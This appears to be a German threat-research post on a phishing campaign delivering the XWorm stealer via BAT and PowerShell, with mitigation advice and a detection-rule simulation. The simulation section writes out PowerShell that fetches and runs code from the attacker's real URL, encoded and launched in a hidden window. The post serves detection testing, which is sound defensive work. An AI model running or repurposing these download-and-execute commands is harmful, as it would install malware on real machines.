SOC Prime Bias: Mittel

06 Feb 2026 15:26 UTC

Bösartiges Script liefert mehr Bösartigkeit

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Bösartiges Script liefert mehr Bösartigkeit
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Zusammenfassung

Eine Phishing-E-Mail liefert einen bösartigen Anhang mit einem BAT-Skript, das PowerShell startet, um eine Base64-codierte Nutzlast herunterzuladen. Nach der Dekodierung entschlüsselt sich die Nutzlast zu XWorm, einem .NET Stealer, der den Host fingerprintet und gesammelte Daten über einen Telegram-Bot exfiltriert. Die Persistenz wird durch das Erstellen eines geplanten Tasks gewährleistet, der die abgelegte ausführbare Datei wiederholt ausführt. Der Betrieb stützt sich auf mehrere Infrastrukturkomponenten, einschließlich eines gefälschten Bild-Hosting-Köders und mindestens einer kompromittierten IP, die zur Nutzlast-Bereitstellung verwendet wird.

Untersuchung

Die Überprüfung des BAT-Skripts ergab eine PowerShell-Einzeiler, der eine wie eine PNG-Datei aussehende Datei von einer angreiferkontrollierten Domain abruft. Der eingebettete Base64-Inhalt wird dann bereinigt, umgedreht und dekodiert, um das .NET-Executable zu rekonstruieren. Die Analyse des Binärcodes zeigte, dass die Malware einen geplanten Task mit dem Namen Chromiumx2 registriert und die Telegram-API für Kommando- und Kontrollzwecke sowie zur Datenexfiltration nutzt. Ermittler extrahierten wichtige Netzwerkindikatoren, darunter die Hosting-Domain, die zugehörige IP-Adresse und den Telegram-API-Endpunkt, auf den während der Ausführung verwiesen wurde.

Minderung

Verhindern Sie die Ausführung unzuverlässiger BAT- und PowerShell-Inhalte, die von E-Mail-Anhängen oder aus Benutzer-Download-Verzeichnissen stammen. Wenden Sie eine Applikations-Whitelist an, um die Erstellung geplanter Aufgaben zu beschränken und verdächtige neue Task-Registrierungen zu markieren. Überwachen und, soweit möglich, beschränken Sie den ausgehenden Zugriff auf Telegram-API-Endpunkte und blockieren Sie die erkannten bösartigen Domains auf DNS-/Proxy-Ebenen. Halten Sie die Endpoint-Erkennungen mit neu beobachteten Indikatoren und skriptbasierten Download-Mustern auf dem neuesten Stand.

Reaktion

Isolieren Sie Endpunkte, an denen der geplante Task Chromiumx2 oder Chromiumx2.exe beobachtet wird. Entfernen Sie den geplanten Task, löschen Sie die bösartige Binärdatei und sammeln Sie Artefakte (Skript, dekodierte Nutzlast, Task-XML und relevante Logs) für forensische Untersuchungen. Suchen Sie in der Umgebung nach denselben Tasknamen, ähnlichem PowerShell-Dekodierverhalten und Telegram-getriebenem Verkehr. Setzen Sie möglicherweise kompromittierte Anmeldeinformationen zurück und benachrichtigen Sie die Benutzer über den Phishing-Anhang, um die Wiederholung der Ausführung zu reduzieren.

Angriffsfluss

Simulationsausführung

Voraussetzung: Die Telemetrie- & Baseline-Vorflugprüfung muss bestanden sein.

  • Angriffserzählung & Befehle:
    Der Angreifer möchte eine bösartige Nutzlast von einem kompromittierten Webserver herunterladen und ausführen. Um klassische Signaturerkennung zu umgehen, bettet er die gesamte Logic zum Download und zur Ausführung in einen einzelnen Base64-String ein und ruft PowerShell auf mit -EncodedCommand. Der Befehl verweist auf die genaue URL, die die Erkennungsregel überwacht (https://uniworldrivercruises-co.uk/optimized_MSI.png).

    1. Kodieren der bösartigen Nutzlast (ein einfacher Downloader, der das empfangene Skript ausführt):

      $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
      $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
      Write-Host $b64

      Ergebnis B64 (Beispiel): SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA... (abgekürzt).

    2. Führen Sie den kodierten Befehl aus:

      powershell -EncodedCommand SQBFAFgAIABpAG4AIABOAGUAdwAtAE8AbgB0AGkAYwBzACA...

    Diese einzelne Zeile erzeugt die genaue Telemetrie, die die Sigma-Regel erwartet: ein PowerShell-Prozess, das -EncodedCommand -Flag, und die bösartige URL im dekodierten Skriptblock.

  • Regressionstestskript:

    #-------------------------------------------------
    # Regression-Skript zum Auslösen der Erkennungsregel
    #-------------------------------------------------
    # 1. Erstellen Sie die bösartige Nutzlast
    $payload = "IEX (New-Object Net.WebClient).DownloadString('https://uniworldrivercruises-co.uk/optimized_MSI.png')"
    $b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
    
    # 2. Führen Sie die Nutzlast über einen kodierten PowerShell-Befehl aus
    Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $b64" `
        -WindowStyle Hidden -PassThru | Out-Null
    
    Write-Host "Bösartiger kodierter Befehl ausgeführt."
    #-------------------------------------------------
  • Bereinigungskommandos:

    # Entfernen Sie alle temporären Dateien (keine erwartet, da die Nutzlast direkt gestreamt wird)
    # Beenden Sie alle verbliebenen versteckten PowerShell-Prozesse, die durch den Test gestartet wurden
    Get-Process -Name "powershell" -ErrorAction SilentlyContinue |
        Where-Object {$_.StartInfo.Arguments -match "-EncodedCommand"} |
        Stop-Process -Force
    
    Write-Host "Bereinigung abgeschlossen."